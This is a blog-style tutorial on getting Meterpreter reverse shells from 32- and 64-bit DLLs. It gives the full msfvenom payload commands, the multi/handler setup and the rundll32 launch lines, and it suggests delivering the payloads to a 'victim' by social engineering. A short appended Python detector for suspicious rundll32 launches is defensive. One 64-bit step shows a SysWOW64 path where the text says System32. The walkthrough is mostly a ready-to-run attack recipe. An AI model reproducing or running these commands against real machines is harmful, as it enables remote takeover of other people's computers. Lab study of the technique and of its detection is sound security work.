Meterpreter shell as a 32 & 64 Bit DLL

goswamiijaya, published in SecureBit, Aug 25, 2020

A post on how to get a Meterpreter shell as a 32-bit and 64-bit DLL.

We will use the System32 and SysWOW64 redirectors to run the DLL payloads and create a Meterpreter shell.

Note: my IP, i.e. LHOST, is 192.168.137.130 (Kali instance), LPORT is 9500, and the victim's IP, i.e. RHOST, is 192.168.137.132 (Windows 7 instance).

Follow the steps below:

1. Creating a payload using msfvenom:

For a 32-bit DLL

Use the command:

msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_32bit.dll

For a 64-bit DLL

Use the command:

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_64bit.dll

Check both files and transfer them to the victim's system using any social engineering method.

2. Transferring payloads to the victim using social engineering:

Here, I'm using a simple Python HTTP server to host the files and transfer them to the victim's instance. Also, I've moved the above payloads into a folder named dll.

To run a Python HTTP server:

Use the command: python -m SimpleHTTPServer

Connect to the attacker's server at 192.168.137.130:8000 using the victim's browser. Download and save both files on the Desktop (for simplicity).

3. Start a reverse handler on the attacker's machine:

Here, we start a reverse TCP handler on Kali, which will accept the reverse shell connection from the Windows 7 machine.

Start msfconsole and use the commands:

msf> use exploit/multi/handler

> set PAYLOAD windows/meterpreter/reverse_tcp

> set LHOST 192.168.137.130

> set LPORT 9500

> exploit

A reverse TCP handler is started.

4. Run the DLL as a Meterpreter shell:

Open CMD on Windows 7.

Use the command:

C:\Users\Windows7>C:\Windows\SysWOW64\rundll32.exe Desktop\reverse_32bit.dll

Nothing will execute; we need to pass a random parameter to the above DLL.

Use the command: C:\Users\Windows7>C:\Windows\SysWOW64\rundll32.exe Desktop\reverse_32bit.dll,xyz

5. Check the reverse TCP handler:

A Meterpreter shell is created from the Windows 7 instance to the Kali instance.

For a 64-bit instance:

Start a reverse handler for an x64 payload and use System32 in place of SysWOW64.

Use the command: set PAYLOAD windows/x64/meterpreter/reverse_tcp

Use the command: C:\Users\Windows7>C:\Windows\SysWOW64\rundll32.exe Desktop\reverse_64bit.dll,xyz

SysWOW64 also works for a 64-bit DLL.

Check the handler: Meterpreter session 2 has been created.

Change SysWOW64 to System32:

Use the command: C:\Users\Windows7>C:\Windows\System32\rundll32.exe Desktop\reverse_32bit.dll,xyz

Check the handler: Meterpreter session 3 has been created.

For more information on the file system redirector, refer to:

https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector
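
On the defender's side, the rundll32 launches from steps 4 and 5 show up in process-creation logs. The following is an added example, not part of the original post: it triages constructed command lines and flags rundll32 loading a DLL from outside the Windows directory. The function names, the sample lines, and the C:\Windows and C:\Users\Windows7 paths are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation command lines (not from a real log). The working
# directory C:\Users\Windows7 is an assumption taken from the prompt on the page.
SAMPLE_EVENTS = [
    r"C:\Windows\SysWOW64\rundll32.exe Desktop\reverse_32bit.dll,xyz",
    r"C:\Windows\System32\rundll32.exe Desktop\reverse_64bit.dll,xyz",
    r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\shell32.dll",Control_RunDLL',
    r"C:\Windows\System32\rundll32.exe printui.dll,PrintUIEntry /?",
    r"C:\Windows\System32\notepad.exe C:\Users\Windows7\Desktop\notes.txt",
]

# host image, DLL path (quoted or not), optional ",entry point"
CMD = re.compile(r'^(?:"([^"]+)"|(\S+))\s+(?:"([^"]+)"|([^\s,"]+))(?:\s*,\s*(\S+))?')
# Bitness by directory holds for a 64-bit parent on 64-bit Windows; a 32-bit
# parent asking for System32 is redirected to SysWOW64 by the file system redirector.
HOST_BITS = {"syswow64": 32, "system32": 64}

def triage(cmdline, cwd=r"C:\Users\Windows7"):
    """Return a finding dict for a rundll32 launch, or None for other processes."""
    m = CMD.match(cmdline.strip())
    if not m:
        return None
    host = PureWindowsPath(m.group(1) or m.group(2))
    if host.name.lower() not in ("rundll32.exe", "rundll32"):
        return None
    dll = PureWindowsPath(m.group(3) or m.group(4))
    bare_name = len(dll.parts) == 1          # e.g. printui.dll, found via search path
    if not bare_name and not dll.is_absolute():
        dll = PureWindowsPath(cwd) / dll      # resolve relative to the working directory
    # Assumes Windows is installed in C:\Windows.
    in_windir = str(dll).lower().startswith("c:\\windows\\")
    return {
        "host_bits": HOST_BITS.get(host.parent.name.lower()),
        "dll": str(dll),
        "entry": m.group(5),
        "suspicious": not bare_name and not in_windir,
    }

def suspicious_events(events):
    """Keep only rundll32 launches whose DLL sits outside the Windows directory."""
    findings = (triage(e) for e in events)
    return [f for f in findings if f and f["suspicious"]]

if __name__ == "__main__":
    for finding in suspicious_events(SAMPLE_EVENTS):
        print(finding)
```

In a real pipeline the command line and working directory would come from the process-creation event itself rather than from a fixed default.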
